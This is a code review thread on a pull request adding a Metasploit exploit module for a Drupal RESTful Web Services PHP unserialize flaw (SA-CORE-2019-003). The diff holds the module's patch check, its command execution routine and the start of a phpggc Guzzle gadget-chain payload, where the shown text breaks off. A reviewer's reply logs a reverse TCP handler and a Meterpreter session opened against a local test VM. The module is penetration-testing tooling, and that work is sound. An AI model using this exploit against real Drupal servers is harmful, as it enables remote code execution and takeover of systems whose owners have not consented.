modules/exploits/unix/webapp/drupal_restws_unserialize.rb

```diff
@@ -0,0 +1,244 @@
+    end
+
+    changelog = drupal_changelog(version)
+
+    unless changelog
+      vprint_error('Could not determine Drupal patch level')
+      return checkcode
+    end
+
+    # HACK: Patch level removed since undetermined 8.x release
+    if changelog.include?('For a full list of fixes in the latest release')
+      vprint_warning('CHANGELOG.txt no longer contains patch level')
+    elsif changelog.include?('SA-CORE-2019-003')
+      vprint_warning('Drupal appears patched in CHANGELOG.txt')
+      checkcode = CheckCode::Safe
+    else
+      vprint_good('Drupal appears unpatched in CHANGELOG.txt')
+      checkcode = CheckCode::Appears
+    end
+
+    checkcode
+  end
+
+  def exploit
+    if [CheckCode::Safe, CheckCode::Unknown].include?(check)
+      if datastore['ForceExploit']
+        print_warning('ForceExploit set! Exploiting anyway!')
+      else
+        fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')
+      end
+    end
+
+    if datastore['PAYLOAD'] == 'cmd/unix/generic'
+      print_warning('Enabling DUMP_OUTPUT for cmd/unix/generic')
+      # XXX: Naughty datastore modification
+      datastore['DUMP_OUTPUT'] = true
+    end
+
+    case target['Type']
+    when :php_memory
+      # XXX: This will spawn a *very* obvious process
+      execute_command("php -r '#{payload.encoded}'")
+    when :unix_memory
+      execute_command(payload.encoded)
+    end
+  end
+
+  def execute_command(cmd, opts = {})
+    vprint_status("Executing with system(): #{cmd}")
+
+    # https://en.wikipedia.org/wiki/Hypertext_Application_Language
+    hal_json = JSON.pretty_generate(
+      'link'      => [
+        'value'   => 'link',
+        'options' => phpggc_payload(cmd)
+      ],
+      '_links'    => {
+        'type'    => {
+          'href'  => vhost_uri
+        }
+      }
+    )
+
+    print_status("Sending #{meth} to #{node_uri} with link #{vhost_uri}")
+
+    res = send_request_cgi({
+      'method'   => meth,
+      'uri'      => node_uri,
+      'ctype'    => 'application/hal+json',
+      'vars_get' => {'_format' => 'hal_json'},
+      'data'     => hal_json
+    }, 3.5)
+
+    return unless res
+
+    case res.code
+    when 200
+      if meth == 'GET'
+        print_warning('If you did not get code execution, try a new node ID')
+      end
+    when 404
+      fail_with(Failure::NotFound, "#{node_uri} not found")
+    when 405
+      fail_with(Failure::NoTarget, "#{meth} method not allowed")
+    when 422
+      fail_with(Failure::NoTarget, 'VHOST may need to be set')
+    when 406
+      fail_with(Failure::NotFound, 'Web Services may not be enabled')
+    else
+      fail_with(Failure::UnexpectedReply, "#{res.code}: #{res.body}")
+    end
+
+    print_line(res.body) if datastore['DUMP_OUTPUT']
+  end
+
+  # phpggc Guzzle/RCE1 system id
+  def phpggc_payload(cmd)
+    (
+      # http://www.phpinternalsbook.com/classes_objects/serialization.html
+      <<~EOF
+        O:24:"GuzzleHttp\\Psr7\\FnStream":2:{
```

Comment:
I have to say this was fun pulling apart the serialized PHP with my eyeballs. /s 😅

Reply:
Testing on my VM it will take a few minutes..

Reply:
The check command didn't really helped me here (why did you remove the printf command execution?)

But.. The exploit worked great (much faster than on my version) :)

```
sf5 exploit(unix/webapp/drupal_restws_unserialize) > check
[*] 127.0.0.1:80 - The target service is running, but could not be validated.
msf5 exploit(unix/webapp/drupal_restws_unserialize) > run

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4444 
[*] Sending POST to /drupal-8.6.9/node with link http://localhost/drupal-8.6.9/rest/type/shortcut/default
[*] Sending stage (38247 bytes) to 127.0.0.1
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:48818) at 2019-03-05 19:08:08 -0500
```

Reply:
Ah, I removed it when I implemented `GET`. How about I enable it for `POST`? :)

Reply:
I've also got a new method in the Drupal mixin to handle figuring out patch level. I'll put that in as well.

Reply:
Great.. I have to get some sleep.. waking up in about ~4 hours, so.. :) Good night and thanks for the great work!! 💓

Reply:
You too!